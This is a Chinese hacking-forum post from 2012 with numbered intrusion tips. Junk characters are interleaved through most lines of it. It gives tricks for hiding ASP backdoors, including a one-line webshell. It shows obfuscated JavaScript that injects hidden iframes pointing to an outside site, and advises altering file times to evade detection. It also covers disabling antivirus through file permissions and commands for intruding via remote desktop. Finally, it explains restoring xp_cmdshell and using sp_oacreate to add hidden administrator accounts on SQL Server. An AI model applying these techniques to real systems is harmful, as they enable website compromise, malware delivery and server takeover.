. t- `4 q7 ?: {) ]% Q& p# B, T1 r3 p- Z0 U3 y% T
53、隐藏ASP后门的两种方法2 y8 S7 g) l& g- Z% X9 B) r
1、建立非标准目录:mkdir images..\! b/ F# ^" w% T
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
3 B& k: S9 z" Z9 P( q' w: c& E通过web访问ASP木马:http://ip/images../news.asp?action=login& K8 o( b& \0 x1 [3 P5 G
如何删除非标准目录:rmdir images..\ /s
) D% n% e1 b# r4 l' j7 s2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:4 E# P5 p' ^$ y' W
mkdir programme.asp! m. v6 ^+ P' f+ V. |
新建1.txt文件内容:<!--#include file=”12.jpg”-->5 U( o& |& \- J0 H+ l. Q$ _8 T
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件4 g) J, m, O! L4 \7 L
attrib +H +S programme.asp
' T1 Y% R/ u( @通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
5 w# u6 Z5 M5 M& \9 s" H7 |1 [
! y9 m( @! ?& ^0 _9 [5 W54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。0 a5 I2 ~1 n/ n2 D! T
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
) m8 E5 x1 ]9 _7 f" `/ Z
{+ s2 x8 E$ X1 i55、JS隐蔽挂马
2 S" ?! b/ r/ g! ~- N1.; h9 O! a) t4 u# M/ k( v
var tr4c3="<iframe src=ht";; z) u8 {- B; y7 J! v2 ^; x" |
tr4c3 = tr4c3+"tp:/";
+ v) y3 w4 b# i& |$ K+ T3 ftr4c3 = tr4c3+"/ww";$ P. r6 F8 H: ]2 H% K" Q! \# Z
tr4c3 = tr4c3+"w.tr4";5 m! k- h. v6 x8 Z- D, s( k2 r8 {
tr4c3 = tr4c3+"c3.com/inc/m";4 S# ^9 T1 S: U1 z9 Z
tr4c3 = tr4c3+"m.htm style="display:none"></i";% {4 A3 L1 a# y* q! e7 d
tr4c3 =tr4c3+"frame>'";. l, z7 B+ b( ^. C% o; D, M2 Y
document.write(tr4c3);- G' R2 X* B8 F8 o* Q Y
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
( s1 a& C, ~0 }: H
+ ^# o6 Q) R3 O' R" s+ w2.
- f. ~! h6 `4 o5 x: b5 S, D转换进制,然后用EVAL执行。如
1 L" g, |* o3 ]+ j' [5 meval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");* L4 w) e4 m; ~' q
不过这个有点显眼。' ?, B+ K# G/ j2 H
3./ B( A) ?' G2 z3 Z5 G8 Z# E" ?) j
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');1 {! y( ~ V( q' n6 j
最后一点,别忘了把文件的时间也修改下。
0 V. |$ a$ ^" H9 o: D; t* G, C
7 G: p# n5 ]" M; ]; R56.3389终端入侵常用DOS命令
7 u& N8 _! T1 [4 v: p wtaskkill taskkill /PID 1248 /t9 i# a. f- f, ]' Q" x" [
1 a5 _* I7 S" ?/ A2 X4 R- `: a* Ktasklist 查进程 t; S4 Z: O6 c
8 F0 u- q3 x1 F3 R8 X
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
- u% u: f: d# M |) Viisreset /reboot
. X0 z& X4 s+ d) I. [' Y8 f# Ntsshutdn /reboot /delay:1 重起服务器4 \, E$ J) b( c8 ~% ~& G
. w) [! j. ]" Y' n$ \" H7 h) g$ [logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
8 B2 y* t. y. t7 f+ _, s, Z: U9 F: _3 |
query user 查看当前终端用户在线情况
1 l& L5 G7 L, q# W3 ]2 P. p* L$ r+ B3 \3 P9 x( P8 |
要显示有关所有会话使用的进程的信息,请键入:query process *% S3 a& D/ n% t- p# r% B
& l O4 w5 @2 m( A, { D" U8 u
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
8 }5 F* c9 Z/ W$ p9 @) `/ G) W/ @3 @, h* \' V6 U
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
! K: e) F" J: ?- v. K& \* B$ J( T; Z
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
/ f5 \. l }5 i6 q; q$ m+ [. k( T! ~5 D" G" E9 B0 i- D0 B
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启$ `1 N* H/ H- i" d z; K' \
) e* l1 r1 t4 i p3 n( l, X命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统2 A$ r/ U& t, `+ s
- ?. a s( n8 S: Q2 w
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
! m# Q4 ?" v, L8 p2 t
: M v2 I+ s* K# [( X2 w9 b0 Q5 {命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机" j0 |% J3 g+ E5 t
% y. }4 u( s0 d& j; m' U8 w56、在地址栏或按Ctrl+O,输入:
* _3 }6 r+ M6 ]( [javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;! D' O( q. o5 Z9 W
7 O' {5 j' B6 L& P" E! D! {, A3 {
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
. Y9 w! d) F. f) L
3 h) Q! O0 o0 T. c# K57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
w$ S2 ?# R6 d/ a用net localgroup administrators是可以看到管理组下,加了$的用户的。8 I& c+ ]8 ~7 ~8 X3 q2 D4 h$ Q
) x& o6 ~4 h h$ ^
58、 sa弱口令相关命令0 R& }3 z9 f; E
( P' r! Y; K- Y4 u0 O一.更改sa口令方法:
1 W( q2 e" T& s" a3 e; L$ S4 ~/ S用sql综合利用工具连接后,执行命令:9 R! r. p4 G0 @4 m0 X! T
exec sp_password NULL,'20001001','sa') p! U8 n+ k0 a! Y
(提示:慎用!)1 ~% [ H) D* Y
: u. n9 ~! r# I! |5 ?二.简单修补sa弱口令.
( c, e, m6 R' M, G' [# n
6 }/ g. |# g4 h+ v; P1 n方法1:查询分离器连接后执行:) w1 ^4 y5 [: G [1 m8 g2 y, m
if exists (select * from
; H: c6 | V. x3 r; R: U: V4 N8 jdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and2 R2 C) ]3 [9 v# p
OBJECTPROPERTY(id, N'IsExtendedProc') = 1) N* N2 B7 C5 t- z8 b7 B
$ S5 Y( E l P$ W" a1 @exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
* z) N, H5 X- Q. D6 z3 z/ G1 t, a9 A5 v& i
GO
) f3 L; d5 A% z |2 u7 I% ^: K) F8 x- M! Q
然后按F5键命令执行完毕- N' S& Z" {5 E( h4 x5 j
* U5 I9 ?1 M' Y N0 _! O' p方法2:查询分离器连接后: B# j' R/ C8 Q- K7 k7 w" Q, X# a
第一步执行:use master
+ k9 T8 K4 N) O- w! n9 L第二步执行:sp_dropextendedproc 'xp_cmdshell'
9 s, }, N+ R' r; M; R然后按F5键命令执行完毕
8 m* o: C% l6 q( d8 G& ?+ N; W3 k8 y
- h2 [" U8 C# v \, e
三.常见情况恢复执行xp_cmdshell.2 X1 A6 B: M5 r! z# ~, s/ N- z
. f) t+ U. v7 p) c( A8 t" @0 b
4 y" D+ `+ K3 d- i1 未能找到存储过程'master..xpcmdshell'.
# ]3 x- m# }, S2 K$ j5 T* P5 {9 | 恢复方法:查询分离器连接后,
* ~1 M2 e9 r2 H. b7 R2 U: E第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int* w+ ]% V7 `: I5 O5 Y {+ S( \4 o
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll') m# [4 m4 D L/ u2 o
然后按F5键命令执行完毕
# Y1 z, I# v/ l* \2 d+ P4 t- O8 @' s+ m4 }
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)( m1 ^, l$ q$ z! b8 p
恢复方法:查询分离器连接后,
{9 q1 Y4 E7 _+ `- {第一步执行:sp_dropextendedproc "xp_cmdshell"
9 }6 ^3 C( U* O, i& R第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'# ?/ h: i' M, ~9 x; _
然后按F5键命令执行完毕1 {! V, L- a Q8 c# g' Y
' x; L9 z9 F t) F% e7 ^3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
1 U& h- N4 M9 B# a9 G7 I! O0 ?3 g恢复方法:查询分离器连接后,
! X4 F0 Y- `/ m5 C3 C第一步执行:exec sp_dropextendedproc 'xp_cmdshell' Y8 O; v3 \: A4 M! _
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 6 N T# H: I" L
然后按F5键命令执行完毕. {: H1 q9 e, y7 ^2 |5 O4 U
2 h* C9 |( C( i
四.终极方法.
' V+ E1 @& ^+ ~如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:4 i" ]8 t- u9 _6 b+ ]/ F% f; B
查询分离器连接后,7 n* X$ w5 t6 X6 w( O0 h2 [( p
2000servser系统:% d* V' }7 o3 a# e, h7 \. F
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'/ H7 {7 F- L4 ?* S. Z" O
+ b+ {; u& c2 c% u- l2 C7 D( J6 adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
* x# d2 t: H/ G. E j4 p) n) z7 D# t7 w; Z0 l8 _. H# S
xp或2003server系统:# j3 v' m0 k5 j$ B
& R) s' g* R& P: u% {declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'# z2 l% u/ { f4 q+ f7 Z9 t
2 }. h4 h+ @' W( L8 }declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'* K7 V! U$ m$ Q" j4 |) N& R
|
发表于 2012-9-15 14:13:15
收藏
支持
反对